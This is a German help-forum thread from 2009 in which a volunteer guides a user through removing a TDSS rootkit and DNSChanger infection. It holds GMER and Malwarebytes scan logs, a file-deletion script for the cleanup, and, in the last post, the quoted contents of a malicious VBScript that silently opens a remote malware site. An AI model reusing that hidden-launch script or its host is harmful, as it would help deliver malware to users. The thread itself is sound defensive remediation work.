Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: Befall TDSS-X, TDSSPack-L, -K, -O

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 13.06.2009, 16:49   #16
Angel21
 
Befall TDSS-X, TDSSPack-L, -K, -O - Standard

Befall TDSS-X, TDSSPack-L, -K, -O



Lade es bei materialordner.de hoch und schicke den Link zur Info.txt und zum Log.txt.
__________________
Avira Upgrade 10 ist auf dem Markt!
Agressive Einstellung von Avira

What goes around comes around!

Alt 13.06.2009, 16:50   #17
john.doe
 
Befall TDSS-X, TDSSPack-L, -K, -O - Standard

Befall TDSS-X, TDSSPack-L, -K, -O



Über dem Textfeld sind zwei Symbolleisten, klicke jeweils auf das vierte Symbol von rechts => # und füge dann den Text ein.

Falls es zu groß ist, dann lade es bei einem Filehoster hoch (z.B. www.materialordner.de) und poste hier den Link.

ciao, andreas
__________________

__________________

Alt 13.06.2009, 16:53   #18
oederland
 
Befall TDSS-X, TDSSPack-L, -K, -O - Standard

Befall TDSS-X, TDSSPack-L, -K, -O



info: http://www.materialordner.de/o9XBrZSQgBHv7qI27gbLewHIlfl9R4m.html
log: http://www.materialordner.de/Q2fiYYZ5pvpkKYcG4dh9zPGLVTKALXf.html

Wahrscheinlich wart ich jetzt, bevor ich GMER starte...
__________________

Alt 13.06.2009, 16:57   #19
john.doe
 
Befall TDSS-X, TDSSPack-L, -K, -O - Standard

Befall TDSS-X, TDSSPack-L, -K, -O



Schön, dann warten wir halt beide. Ich brauche das Gmer-Log.

ciao, andreas
__________________
Kein Support per PN! Das ist hier ein Forum und keine Privatbetreuung!
Privatbetreuung nur gegen Bezahlung und ich koste sehr teuer.
Für alle Neuen
Anleitungen
Virenscanner
Kompromittierung unvermeidbar?

Alt 13.06.2009, 16:59   #20
oederland
 
Befall TDSS-X, TDSSPack-L, -K, -O - Standard

Befall TDSS-X, TDSSPack-L, -K, -O



Tschuldigung, wird gemacht


Alt 13.06.2009, 17:01   #21
oederland
 
Befall TDSS-X, TDSSPack-L, -K, -O - Standard

Befall TDSS-X, TDSSPack-L, -K, -O



Das ist aber jetzt schnell durchgelaufen, von wegen 3 bis 10 Minuten... und hier das Ergebnis:

GMER 1.0.15.14966 - http://www.gmer.net
Rootkit scan 2009-06-13 18:01:00
Windows 5.1.2600 Service Pack 2


---- System - GMER 1.0.15 ----

Code 860EF838 ZwEnumerateKey
Code 861057B8 ZwFlushInstructionCache
Code 8610D4BE IofCallDriver
Code 86101AB6 IofCompleteRequest

---- Kernel code sections - GMER 1.0.15 ----

.text ntkrnlpa.exe!IofCallDriver 804EF0BC 5 Bytes JMP 8610D4C3
.text ntkrnlpa.exe!IofCompleteRequest 804EF14C 5 Bytes JMP 86101ABB
PAGE ntkrnlpa.exe!ZwFlushInstructionCache 805B528A 5 Bytes JMP 861057BC
PAGE ntkrnlpa.exe!ZwEnumerateKey 8062296E 5 Bytes JMP 860EF83C
? nwfilter.sys Das System kann die angegebene Datei nicht finden. !
? system32\drivers\athiport.sys Das System kann den angegebenen Pfad nicht finden. !

---- User code sections - GMER 1.0.15 ----

.text C:\WINDOWS\system32\winlogon.exe[480] ntdll.dll!LdrLoadDll 7C925CBB 5 Bytes JMP 0068000A
.text C:\WINDOWS\system32\winlogon.exe[480] ntdll.dll!LdrUnloadDll 7C926C83 5 Bytes JMP 0069000A
.text C:\WINDOWS\system32\services.exe[524] ntdll.dll!LdrLoadDll 7C925CBB 5 Bytes JMP 006F000A
.text C:\WINDOWS\system32\services.exe[524] ntdll.dll!LdrUnloadDll 7C926C83 5 Bytes JMP 0071000A
.text C:\WINDOWS\system32\lsass.exe[536] ntdll.dll!LdrLoadDll 7C925CBB 5 Bytes JMP 0071000A
.text C:\WINDOWS\system32\lsass.exe[536] ntdll.dll!LdrUnloadDll 7C926C83 5 Bytes JMP 0075000A

---- Devices - GMER 1.0.15 ----

AttachedDevice \FileSystem\Ntfs \Ntfs savonaccessfilter.sys (SAV On-access and HIPS for Windows XP (x86)/Sophos Plc)
AttachedDevice \FileSystem\Fastfat \Fat savonaccessfilter.sys (SAV On-access and HIPS for Windows XP (x86)/Sophos Plc)
AttachedDevice \FileSystem\Fastfat \Fat fltMgr.sys (Microsoft Filesystem Filter Manager/Microsoft Corporation)

---- EOF - GMER 1.0.15 ----

Alt 13.06.2009, 17:06   #22
john.doe
 
Befall TDSS-X, TDSSPack-L, -K, -O - Standard

Befall TDSS-X, TDSSPack-L, -K, -O



uacd.sys ist tot.

1.) Deinstalliere Malwarebytes.

2.) http://www.trojaner-board.de/51187-a...i-malware.html

ciao, andreas
__________________
Kein Support per PN! Das ist hier ein Forum und keine Privatbetreuung!
Privatbetreuung nur gegen Bezahlung und ich koste sehr teuer.
Für alle Neuen
Anleitungen
Virenscanner
Kompromittierung unvermeidbar?

Alt 13.06.2009, 17:08   #23
oederland
 
Befall TDSS-X, TDSSPack-L, -K, -O - Standard

Befall TDSS-X, TDSSPack-L, -K, -O



Also ich deinstalliere es, dann fahr ich runter, und dann installier ichs neu, korrekt?

Alt 13.06.2009, 17:09   #24
john.doe
 
Befall TDSS-X, TDSSPack-L, -K, -O - Standard

Befall TDSS-X, TDSSPack-L, -K, -O





ciao, andreas
__________________
Kein Support per PN! Das ist hier ein Forum und keine Privatbetreuung!
Privatbetreuung nur gegen Bezahlung und ich koste sehr teuer.
Für alle Neuen
Anleitungen
Virenscanner
Kompromittierung unvermeidbar?

Alt 13.06.2009, 17:14   #25
oederland
 
Befall TDSS-X, TDSSPack-L, -K, -O - Standard

Befall TDSS-X, TDSSPack-L, -K, -O



So es wäre installiert und geöffnet. Was nun?

Alt 13.06.2009, 17:15   #26
oederland
 
Befall TDSS-X, TDSSPack-L, -K, -O - Standard

Befall TDSS-X, TDSSPack-L, -K, -O



Ich schätze mal "Vollständigen Suchlauf durchführen"?

Alt 13.06.2009, 17:34   #27
john.doe
 
Befall TDSS-X, TDSSPack-L, -K, -O - Standard

Befall TDSS-X, TDSSPack-L, -K, -O



Ja. Steht - glaub ich - auch so in der Anleitung, sogar mit Bildern.

ciao, andreas

p.s.:
1.) Da ComboFix nicht will, nochmal mit Avenger:
Code:
ATTFilter
Drivers to delete:
ACEDRV06

Folders to delete:
C:\Config.Msi
C:\rsit

Files to delete:
C:\WINDOWS\system32\SETC3.tmp
C:\WINDOWS\system32\SETC2.tmp
C:\WINDOWS\tasks\AppleSoftwareUpdate.job
C:\WINDOWS\tasks\{783AF354-B514-42d6-970E-3E8BF0A5279C}.job
         
2.) Was befindet sich in den Ordnern:
Code:
ATTFilter
C:\bd85e4d863ccece3f42812163eb8
C:\d64625eedc0da9ce622a7e182d8a48
C:\aa848d948b894d620da925
         
3.) Mausklick rechts auf
Code:
ATTFilter
C:\tj.vbs
         
=> Bearbeiten, kompletten Inhalt posten.
__________________
Kein Support per PN! Das ist hier ein Forum und keine Privatbetreuung!
Privatbetreuung nur gegen Bezahlung und ich koste sehr teuer.
Für alle Neuen
Anleitungen
Virenscanner
Kompromittierung unvermeidbar?

Geändert von john.doe (13.06.2009 um 18:10 Uhr)

Alt 13.06.2009, 18:24   #28
oederland
 
Befall TDSS-X, TDSSPack-L, -K, -O - Standard

Befall TDSS-X, TDSSPack-L, -K, -O



So hier ist das Teil:

Code:
ATTFilter
Malwarebytes' Anti-Malware 1.37
Datenbank Version: 2182
Windows 5.1.2600 Service Pack 2

13.06.2009 19:17:07
mbam-log-2009-06-13 (19-17-07).txt

Scan-Methode: Vollständiger Scan (C:\|)
Durchsuchte Objekte: 180441
Laufzeit: 52 minute(s), 22 second(s)

Infizierte Speicherprozesse: 0
Infizierte Speichermodule: 0
Infizierte Registrierungsschlüssel: 3
Infizierte Registrierungswerte: 0
Infizierte Dateiobjekte der Registrierung: 3
Infizierte Verzeichnisse: 1
Infizierte Dateien: 12

Infizierte Speicherprozesse:
(Keine bösartigen Objekte gefunden)

Infizierte Speichermodule:
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungsschlüssel:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{500bca15-57a7-4eaf-8143-8c619470b13d} (Trojan.FakeAlert) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{500bca15-57a7-4eaf-8143-8c619470b13d} (Trojan.FakeAlert) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\UAC (Rootkit.Trace) -> Quarantined and deleted successfully.

Infizierte Registrierungswerte:
(Keine bösartigen Objekte gefunden)

Infizierte Dateiobjekte der Registrierung:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{18762948-cfb3-475c-83df-84bb025720b8}\NameServer (Trojan.DNSChanger) -> Data: 85.255.112.101;85.255.112.8 -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{18762948-cfb3-475c-83df-84bb025720b8}\NameServer (Trojan.DNSChanger) -> Data: 85.255.112.101;85.255.112.8 -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip\Parameters\Interfaces\{18762948-cfb3-475c-83df-84bb025720b8}\NameServer (Trojan.DNSChanger) -> Data: 85.255.112.101;85.255.112.8 -> Quarantined and deleted successfully.

Infizierte Verzeichnisse:
C:\resycled (Trojan.DNSChanger) -> Quarantined and deleted successfully.

Infizierte Dateien:
c:\WINDOWS\system32\UACbrjevrletlwnorn.dll (Trojan.TDSS) -> Quarantined and deleted successfully.
c:\WINDOWS\system32\UACgscbrfclqgpeicq.dll (Trojan.TDSS) -> Quarantined and deleted successfully.
c:\WINDOWS\system32\UACwilbiwaxdwktumv.dll (Trojan.TDSS) -> Quarantined and deleted successfully.
c:\WINDOWS\Temp\UAC2594.tmp (Trojan.TDSS) -> Quarantined and deleted successfully.
c:\WINDOWS\Temp\UACc5b1.tmp (Trojan.TDSS) -> Quarantined and deleted successfully.
c:\WINDOWS\Temp\UACe6c6.tmp (Trojan.TDSS) -> Quarantined and deleted successfully.
C:\WINDOWS\system32\uacinit.dll (Trojan.Agent) -> Quarantined and deleted successfully.
C:\WINDOWS\Tasks\{783AF354-B514-42d6-970E-3E8BF0A5279C}.job (Trojan.Downloader) -> Quarantined and deleted successfully.
c:\WINDOWS\system32\UACniomybltfaimovv.dll (Trojan.Agent) -> Quarantined and deleted successfully.
c:\WINDOWS\system32\UACftjcbjrgtvplxmq.dll (Trojan.Agent) -> Quarantined and deleted successfully.
c:\WINDOWS\system32\UACoiohoogyxxmbvgq.dll (Trojan.Agent) -> Quarantined and deleted successfully.
c:\WINDOWS\system32\drivers\UACvkkllrhgnlvppjw.sys (Trojan.Agent) -> Quarantined and deleted successfully.
         
Ich glaube allerdings nicht, dass das alles ist. Im Ordner C:\Dokumente und Einstellungen\Helmut\Lokale Einstellungen\Temp hab ich nämlich noch verschiedene hübsche und meiner Einschätzung nach fragwürdige Dateien 32.tmp, 32.tmp.exe, a.dat, a.exe, b.exe sowie UACded5.tmp

Alt 13.06.2009, 18:27   #29
john.doe
 
Befall TDSS-X, TDSSPack-L, -K, -O - Standard

Befall TDSS-X, TDSSPack-L, -K, -O



Versuche noch einmal Combofix zu starten.

ciao, andreas
__________________
Kein Support per PN! Das ist hier ein Forum und keine Privatbetreuung!
Privatbetreuung nur gegen Bezahlung und ich koste sehr teuer.
Für alle Neuen
Anleitungen
Virenscanner
Kompromittierung unvermeidbar?

Alt 13.06.2009, 18:52   #30
oederland
 
Befall TDSS-X, TDSSPack-L, -K, -O - Standard

Befall TDSS-X, TDSSPack-L, -K, -O



Mist, den letzten Beitrag hab ich nicht gesehen gehabt, da lief das Malware schon. Also:

tj.vbs
Code:
ATTFilter
set Cleaner=createobject("wscript.shell") 
Cleaner.run "iexplore http://stat.winrar2009.cn:88/tj2.htm",vbhide
         
Screenshots der Ordner auf...

http://www.materialordner.de/beJmOJbus41EpSoFPs31bvkWiqz7g7Kh.html

Ich weiß nicht, was das für Zeug ist, das meiste ist vom 29. Juli 2008, ich hab den Rechner erst so im Oktober bekommen.

Jetzt guck ich mal zwecks Combo.

Antwort

Themen zu Befall TDSS-X, TDSSPack-L, -K, -O
adobe, automatische, befall, bios, c:\windows, computer, dateien, entfernen, folge, hängt, klick, link, maßnahme, neustarten, probleme, programme, quarantäne, seite, sophos, suche, system, system32, trojaner, version, windows, öffnen




Ähnliche Themen: Befall TDSS-X, TDSSPack-L, -K, -O


  1. BOO/TDSS.o Befall - was kann ich tun
    Plagegeister aller Art und deren Bekämpfung - 21.10.2014 (12)
  2. BOO/TDss.O
    Plagegeister aller Art und deren Bekämpfung - 12.06.2012 (3)
  3. BOO/Tdss.M
    Log-Analyse und Auswertung - 13.10.2011 (1)
  4. boo tdss.m
    Plagegeister aller Art und deren Bekämpfung - 25.08.2011 (1)
  5. TR/TDss.17.35
    Log-Analyse und Auswertung - 25.03.2011 (9)
  6. BOO/TDss.A
    Plagegeister aller Art und deren Bekämpfung - 06.03.2011 (30)
  7. BOO/TDSS.a
    Plagegeister aller Art und deren Bekämpfung - 11.02.2011 (25)
  8. Befall von Rootkit(TDSS.Gen), Trojan Fraudpack und Rogue Antivir
    Plagegeister aller Art und deren Bekämpfung - 29.06.2010 (8)
  9. atapi.sys-Rootkit (TDSS) und weiterer Befall
    Plagegeister aller Art und deren Bekämpfung - 22.05.2010 (3)
  10. PCK.Tdss.Z.230 und Crypt.ZPACK.Gen Trojaner Befall
    Log-Analyse und Auswertung - 03.02.2010 (8)
  11. Trojan.TDss!K - Packed.Win32.Tdss!IK - und wer weiß was noch alles!
    Plagegeister aller Art und deren Bekämpfung - 09.12.2009 (1)
  12. Tdss
    Log-Analyse und Auswertung - 12.09.2009 (12)
  13. TR/TDss.AT.881
    Log-Analyse und Auswertung - 07.02.2009 (9)
  14. Datensicherung nach Backdoor.Win32.TDSS Befall
    Plagegeister aller Art und deren Bekämpfung - 28.01.2009 (0)
  15. BDS/TDSS.adb, BDS/TDSS.JW und einiges mehr
    Log-Analyse und Auswertung - 14.01.2009 (28)
  16. Rootkit RKIT/TDss.G.22 Backdoorprogramm BDS/TDSS.adb und Trojaner TR/Proxy.GHY
    Log-Analyse und Auswertung - 21.12.2008 (28)
  17. Backdoor.TDSS.asz und TDSS.atb gefunden
    Mülltonne - 28.11.2008 (0)

Zum Thema Befall TDSS-X, TDSSPack-L, -K, -O - Lade es bei materialordner.de hoch und schicke den Link zur Info.txt und zum Log.txt. - Befall TDSS-X, TDSSPack-L, -K, -O...
Archiv
Du betrachtest: Befall TDSS-X, TDSSPack-L, -K, -O auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.